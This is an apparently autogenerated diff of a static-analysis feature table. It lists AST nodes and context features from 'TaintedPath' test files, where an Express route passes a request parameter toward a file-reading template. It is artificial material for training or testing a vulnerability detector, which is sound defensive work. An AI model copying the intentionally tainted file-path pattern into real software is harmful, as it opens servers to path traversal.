autogenerated/TaintedPath/handlebars.js:48:14:51:6 | data.co ... \\n }) | receiverName | res | +| autogenerated/TaintedPath/handlebars.js:48:14:51:6 | exceptional return of data.co ... \\n }) | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:48:14:51:6 | exceptional return of data.co ... \\n }) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:48:14:51:6 | exceptional return of data.co ... \\n }) | enclosingFunctionBody | req res res send data compiledMixed prefix req params prefix path data/path-5.txt | +| autogenerated/TaintedPath/handlebars.js:48:14:51:6 | exceptional return of data.co ... \\n }) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:48:14:51:6 | exceptional return of data.co ... \\n }) | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:48:19:48:31 | compiledMixed | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:48:19:48:31 | compiledMixed | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:48:19:48:31 | compiledMixed | enclosingFunctionBody | req res res send data compiledMixed prefix req params prefix path data/path-5.txt | +| autogenerated/TaintedPath/handlebars.js:48:19:48:31 | compiledMixed | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:48:19:48:31 | compiledMixed | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:48:33:51:5 | {\\n ... "\\n } | CalleeFlexibleAccessPath | data.compiledMixed | | autogenerated/TaintedPath/handlebars.js:48:33:51:5 | {\\n ... "\\n } | InputArgumentIndex | 0 | | autogenerated/TaintedPath/handlebars.js:48:33:51:5 | {\\n ... "\\n } | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | @@ -7328,6 +68818,31 @@ tokenFeatures | autogenerated/TaintedPath/handlebars.js:48:33:51:5 | {\\n ... "\\n } | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/handlebars.js:48:33:51:5 | {\\n ... "\\n } | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:48:33:51:5 | {\\n ... "\\n } | receiverName | data | +| autogenerated/TaintedPath/handlebars.js:49:9:49:14 | prefix | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:49:9:49:14 | prefix | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:49:9:49:14 | prefix | enclosingFunctionBody | req res res send data compiledMixed prefix req params prefix path data/path-5.txt | +| autogenerated/TaintedPath/handlebars.js:49:9:49:14 | prefix | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:49:9:49:14 | prefix | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:49:9:49:33 | prefix: ... .prefix | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:49:9:49:33 | prefix: ... .prefix | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:49:9:49:33 | prefix: ... .prefix | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:49:9:49:33 | prefix: ... .prefix | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:49:9:49:33 | prefix: ... .prefix | enclosingFunctionBody | req res res send data compiledMixed prefix req params prefix path data/path-5.txt | +| autogenerated/TaintedPath/handlebars.js:49:9:49:33 | prefix: ... .prefix | enclosingFunctionBody | req res res send data compiledMixed prefix req params prefix path data/path-5.txt | +| autogenerated/TaintedPath/handlebars.js:49:9:49:33 | prefix: ... .prefix | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:49:9:49:33 | prefix: ... .prefix | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:49:9:49:33 | prefix: ... .prefix | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:49:9:49:33 | prefix: ... .prefix | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:49:17:49:19 | req | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:49:17:49:19 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:49:17:49:19 | req | enclosingFunctionBody | req res res send data compiledMixed prefix req params prefix path data/path-5.txt | +| autogenerated/TaintedPath/handlebars.js:49:17:49:19 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:49:17:49:19 | req | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:49:17:49:26 | req.params | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:49:17:49:26 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:49:17:49:26 | req.params | enclosingFunctionBody | req res res send data compiledMixed prefix req params prefix path data/path-5.txt | +| autogenerated/TaintedPath/handlebars.js:49:17:49:26 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:49:17:49:26 | req.params | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:49:17:49:33 | req.params.prefix | CalleeFlexibleAccessPath | data.compiledMixed | | autogenerated/TaintedPath/handlebars.js:49:17:49:33 | req.params.prefix | InputAccessPathFromCallee | 0.prefix | | autogenerated/TaintedPath/handlebars.js:49:17:49:33 | req.params.prefix | InputArgumentIndex | 0 | @@ -7337,6 +68852,31 @@ tokenFeatures | autogenerated/TaintedPath/handlebars.js:49:17:49:33 | req.params.prefix | enclosingFunctionBody | req res res send data compiledMixed prefix req params prefix path data/path-5.txt | | autogenerated/TaintedPath/handlebars.js:49:17:49:33 | req.params.prefix | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/handlebars.js:49:17:49:33 | req.params.prefix | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:49:21:49:26 | params | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:49:21:49:26 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:49:21:49:26 | params | enclosingFunctionBody | req res res send data compiledMixed prefix req params prefix path data/path-5.txt | +| autogenerated/TaintedPath/handlebars.js:49:21:49:26 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:49:21:49:26 | params | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:49:28:49:33 | prefix | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:49:28:49:33 | prefix | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:49:28:49:33 | prefix | enclosingFunctionBody | req res res send data compiledMixed prefix req params prefix path data/path-5.txt | +| autogenerated/TaintedPath/handlebars.js:49:28:49:33 | prefix | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:49:28:49:33 | prefix | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:50:9:50:12 | path | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:50:9:50:12 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:50:9:50:12 | path | enclosingFunctionBody | req res res send data compiledMixed prefix req params prefix path data/path-5.txt | +| autogenerated/TaintedPath/handlebars.js:50:9:50:12 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:50:9:50:12 | path | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:50:9:50:31 | path: " ... -5.txt" | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:50:9:50:31 | path: " ... -5.txt" | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:50:9:50:31 | path: " ... -5.txt" | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:50:9:50:31 | path: " ... -5.txt" | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:50:9:50:31 | path: " ... -5.txt" | enclosingFunctionBody | req res res send data compiledMixed prefix req params prefix path data/path-5.txt | +| autogenerated/TaintedPath/handlebars.js:50:9:50:31 | path: " ... -5.txt" | enclosingFunctionBody | req res res send data compiledMixed prefix req params prefix path data/path-5.txt | +| autogenerated/TaintedPath/handlebars.js:50:9:50:31 | path: " ... -5.txt" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:50:9:50:31 | path: " ... -5.txt" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:50:9:50:31 | path: " ... -5.txt" | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:50:9:50:31 | path: " ... -5.txt" | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:50:15:50:31 | "data/path-5.txt" | CalleeFlexibleAccessPath | data.compiledMixed | | autogenerated/TaintedPath/handlebars.js:50:15:50:31 | "data/path-5.txt" | InputAccessPathFromCallee | 0.path | | autogenerated/TaintedPath/handlebars.js:50:15:50:31 | "data/path-5.txt" | InputArgumentIndex | 0 | @@ -7346,24 +68886,238 @@ tokenFeatures | autogenerated/TaintedPath/handlebars.js:50:15:50:31 | "data/path-5.txt" | enclosingFunctionBody | req res res send data compiledMixed prefix req params prefix path data/path-5.txt | | autogenerated/TaintedPath/handlebars.js:50:15:50:31 | "data/path-5.txt" | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/handlebars.js:50:15:50:31 | "data/path-5.txt" | fileImports | express fs handlebars | +| autogenerated/TaintedPath/my-async-fs-module.js:1:1:1:0 | this | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-async-fs-module.js:1:1:1:0 | this | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:1:1:1:1 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:1:1:1:1 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-async-fs-module.js:1:1:1:1 | fs | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:1:1:1:1 | module | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:1:1:1:1 | module | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-async-fs-module.js:1:1:1:1 | module | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:1:1:1:1 | promisify | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:1:1:1:1 | promisify | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-async-fs-module.js:1:1:1:1 | promisify | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:1:1:1:1 | require | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-async-fs-module.js:1:1:1:1 | require | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:1:7:1:8 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:1:7:1:8 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-async-fs-module.js:1:7:1:8 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-async-fs-module.js:1:7:1:8 | fs | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:1:7:1:24 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:1:7:1:24 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-async-fs-module.js:1:7:1:24 | fs | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:1:7:1:24 | fs = require('fs') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:1:7:1:24 | fs = require('fs') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-async-fs-module.js:1:7:1:24 | fs = require('fs') | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:1:12:1:18 | require | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:1:12:1:18 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-async-fs-module.js:1:12:1:18 | require | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:1:12:1:24 | exceptional return of require('fs') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:1:12:1:24 | exceptional return of require('fs') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-async-fs-module.js:1:12:1:24 | exceptional return of require('fs') | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:1:12:1:24 | require('fs') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:1:12:1:24 | require('fs') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-async-fs-module.js:1:12:1:24 | require('fs') | fileImports | bluebird fs | | autogenerated/TaintedPath/my-async-fs-module.js:1:20:1:23 | 'fs' | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/my-async-fs-module.js:1:20:1:23 | 'fs' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/my-async-fs-module.js:1:20:1:23 | 'fs' | calleeImports | | | autogenerated/TaintedPath/my-async-fs-module.js:1:20:1:23 | 'fs' | contextFunctionInterfaces | | | autogenerated/TaintedPath/my-async-fs-module.js:1:20:1:23 | 'fs' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/my-async-fs-module.js:1:20:1:23 | 'fs' | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:2:7:2:17 | {promisify} | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:2:7:2:17 | {promisify} | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-async-fs-module.js:2:7:2:17 | {promisify} | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:2:7:2:39 | promisify | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:2:7:2:39 | promisify | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-async-fs-module.js:2:7:2:39 | promisify | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:2:7:2:39 | {promis ... ebird') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:2:7:2:39 | {promis ... ebird') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-async-fs-module.js:2:7:2:39 | {promis ... ebird') | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:2:8:2:16 | promisify | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:2:8:2:16 | promisify | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:2:8:2:16 | promisify | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:2:8:2:16 | promisify | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:2:8:2:16 | promisify | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-async-fs-module.js:2:8:2:16 | promisify | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-async-fs-module.js:2:8:2:16 | promisify | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-async-fs-module.js:2:8:2:16 | promisify | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-async-fs-module.js:2:8:2:16 | promisify | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-async-fs-module.js:2:8:2:16 | promisify | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:2:8:2:16 | promisify | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:2:8:2:16 | promisify | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:2:8:2:16 | promisify | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:2:21:2:27 | require | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:2:21:2:27 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-async-fs-module.js:2:21:2:27 | require | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:2:21:2:39 | exceptional return of require('bluebird') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:2:21:2:39 | exceptional return of require('bluebird') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-async-fs-module.js:2:21:2:39 | exceptional return of require('bluebird') | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:2:21:2:39 | require('bluebird') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:2:21:2:39 | require('bluebird') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-async-fs-module.js:2:21:2:39 | require('bluebird') | fileImports | bluebird fs | | autogenerated/TaintedPath/my-async-fs-module.js:2:29:2:38 | 'bluebird' | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/my-async-fs-module.js:2:29:2:38 | 'bluebird' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/my-async-fs-module.js:2:29:2:38 | 'bluebird' | calleeImports | | | autogenerated/TaintedPath/my-async-fs-module.js:2:29:2:38 | 'bluebird' | contextFunctionInterfaces | | | autogenerated/TaintedPath/my-async-fs-module.js:2:29:2:38 | 'bluebird' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/my-async-fs-module.js:2:29:2:38 | 'bluebird' | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:4:7:4:13 | methods | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:4:7:4:13 | methods | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-async-fs-module.js:4:7:4:13 | methods | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:4:7:9:1 | methods | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:4:7:9:1 | methods | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-async-fs-module.js:4:7:9:1 | methods | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:4:7:9:1 | methods ... Sync'\\n] | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:4:7:9:1 | methods ... Sync'\\n] | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-async-fs-module.js:4:7:9:1 | methods ... Sync'\\n] | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:4:17:9:1 | [\\n 're ... Sync'\\n] | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:4:17:9:1 | [\\n 're ... Sync'\\n] | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-async-fs-module.js:4:17:9:1 | [\\n 're ... Sync'\\n] | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:5:3:5:12 | 'readFile' | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:5:3:5:12 | 'readFile' | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:5:3:5:12 | 'readFile' | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-async-fs-module.js:5:3:5:12 | 'readFile' | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-async-fs-module.js:5:3:5:12 | 'readFile' | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:5:3:5:12 | 'readFile' | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:6:3:6:13 | 'writeFile' | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:6:3:6:13 | 'writeFile' | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:6:3:6:13 | 'writeFile' | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-async-fs-module.js:6:3:6:13 | 'writeFile' | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-async-fs-module.js:6:3:6:13 | 'writeFile' | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:6:3:6:13 | 'writeFile' | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:7:3:7:16 | 'readFileSync' | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:7:3:7:16 | 'readFileSync' | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:7:3:7:16 | 'readFileSync' | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-async-fs-module.js:7:3:7:16 | 'readFileSync' | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-async-fs-module.js:7:3:7:16 | 'readFileSync' | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:7:3:7:16 | 'readFileSync' | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:8:3:8:17 | 'writeFileSync' | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:8:3:8:17 | 'writeFileSync' | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:8:3:8:17 | 'writeFileSync' | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-async-fs-module.js:8:3:8:17 | 'writeFileSync' | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-async-fs-module.js:8:3:8:17 | 'writeFileSync' | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:8:3:8:17 | 'writeFileSync' | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:11:1:11:6 | module | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:11:1:11:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-async-fs-module.js:11:1:11:6 | module | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:11:1:11:14 | module.exports | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:11:1:11:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-async-fs-module.js:11:1:11:14 | module.exports | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:11:1:14:6 | module. ... \\n}, {}) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:11:1:14:6 | module. ... \\n}, {}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-async-fs-module.js:11:1:14:6 | module. ... \\n}, {}) | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:11:8:11:14 | exports | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:11:8:11:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-async-fs-module.js:11:8:11:14 | exports | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:11:18:11:24 | methods | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:11:18:11:24 | methods | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-async-fs-module.js:11:18:11:24 | methods | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:11:18:11:31 | methods.reduce | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:11:18:11:31 | methods.reduce | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-async-fs-module.js:11:18:11:31 | methods.reduce | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:11:18:14:6 | exceptional return of methods ... \\n}, {}) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:11:18:14:6 | exceptional return of methods ... \\n}, {}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-async-fs-module.js:11:18:14:6 | exceptional return of methods ... \\n}, {}) | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:11:18:14:6 | methods ... \\n}, {}) | assignedToPropName | exports | +| autogenerated/TaintedPath/my-async-fs-module.js:11:18:14:6 | methods ... \\n}, {}) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:11:18:14:6 | methods ... \\n}, {}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-async-fs-module.js:11:18:14:6 | methods ... \\n}, {}) | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:11:26:11:31 | reduce | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:11:26:11:31 | reduce | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-async-fs-module.js:11:26:11:31 | reduce | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:11:33:11:32 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:11:33:11:32 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-async-fs-module.js:11:33:11:32 | fs | enclosingFunctionBody | obj method obj method promisify fs method obj | +| autogenerated/TaintedPath/my-async-fs-module.js:11:33:11:32 | fs | enclosingFunctionName | methods.reduce#functionalargument | +| autogenerated/TaintedPath/my-async-fs-module.js:11:33:11:32 | fs | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:11:33:11:32 | promisify | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:11:33:11:32 | promisify | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-async-fs-module.js:11:33:11:32 | promisify | enclosingFunctionBody | obj method obj method promisify fs method obj | +| autogenerated/TaintedPath/my-async-fs-module.js:11:33:11:32 | promisify | enclosingFunctionName | methods.reduce#functionalargument | +| autogenerated/TaintedPath/my-async-fs-module.js:11:33:11:32 | promisify | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:11:33:14:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:11:33:14:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-async-fs-module.js:11:33:14:1 | 'arguments' object of anonymous function | enclosingFunctionBody | obj method obj method promisify fs method obj | +| autogenerated/TaintedPath/my-async-fs-module.js:11:33:14:1 | 'arguments' object of anonymous function | enclosingFunctionName | methods.reduce#functionalargument | +| autogenerated/TaintedPath/my-async-fs-module.js:11:33:14:1 | 'arguments' object of anonymous function | fileImports | bluebird fs | | autogenerated/TaintedPath/my-async-fs-module.js:11:33:14:1 | (obj, m ... obj;\\n} | CalleeFlexibleAccessPath | methods.reduce | | autogenerated/TaintedPath/my-async-fs-module.js:11:33:14:1 | (obj, m ... obj;\\n} | InputArgumentIndex | 0 | | autogenerated/TaintedPath/my-async-fs-module.js:11:33:14:1 | (obj, m ... obj;\\n} | contextFunctionInterfaces | | | autogenerated/TaintedPath/my-async-fs-module.js:11:33:14:1 | (obj, m ... obj;\\n} | contextSurroundingFunctionParameters | (obj, method) | | autogenerated/TaintedPath/my-async-fs-module.js:11:33:14:1 | (obj, m ... obj;\\n} | fileImports | bluebird fs | | autogenerated/TaintedPath/my-async-fs-module.js:11:33:14:1 | (obj, m ... obj;\\n} | receiverName | methods | +| autogenerated/TaintedPath/my-async-fs-module.js:11:33:14:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:11:33:14:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-async-fs-module.js:11:33:14:1 | exceptional return of anonymous function | enclosingFunctionBody | obj method obj method promisify fs method obj | +| autogenerated/TaintedPath/my-async-fs-module.js:11:33:14:1 | exceptional return of anonymous function | enclosingFunctionName | methods.reduce#functionalargument | +| autogenerated/TaintedPath/my-async-fs-module.js:11:33:14:1 | exceptional return of anonymous function | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:11:33:14:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:11:33:14:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-async-fs-module.js:11:33:14:1 | return of anonymous function | enclosingFunctionBody | obj method obj method promisify fs method obj | +| autogenerated/TaintedPath/my-async-fs-module.js:11:33:14:1 | return of anonymous function | enclosingFunctionName | methods.reduce#functionalargument | +| autogenerated/TaintedPath/my-async-fs-module.js:11:33:14:1 | return of anonymous function | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:11:34:11:36 | obj | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:11:34:11:36 | obj | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:11:34:11:36 | obj | contextSurroundingFunctionParameters | | 